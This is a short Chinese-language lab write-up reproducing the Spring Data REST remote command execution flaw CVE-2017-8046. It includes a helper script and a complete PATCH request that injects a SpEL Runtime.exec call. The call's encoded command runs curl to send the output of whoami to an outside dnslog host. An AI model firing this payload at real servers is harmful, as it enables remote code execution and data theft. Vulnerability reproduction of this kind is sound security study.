Spring Data Rest 远程命令执行漏洞复现（CVE-2017-8046）

环境搭建好后直接访问，漏洞页面如下

看到有/customers和/profile路径
访问请求会发现响应包有json传值

访问/customers和/profile路径

访问json请求中给的路径

构造poc
http://www.jackson-t.ca/runtime-exec-payloads.html
先对想要执行的命令进行编码然后转ascii码

转ascii直接写了个小脚本

ch=str(input("请输入一串字符："))
a=[]
for i in ch:
    print(i,"的ASCII码为",ord(i))
    a.append(ord(i))
print(a)

poc如下请求包，用patch请求发送

PATCH /customers/1 HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 398

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,51,86,121,98,67,66,103,100,50,104,118,89,87,49,112,89,67,53,122,78,50,86,116,89,106,77,117,90,71,53,122,98,71,57,110,76,109,78,117,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname", "value": "vulhub" }]

成功复现漏洞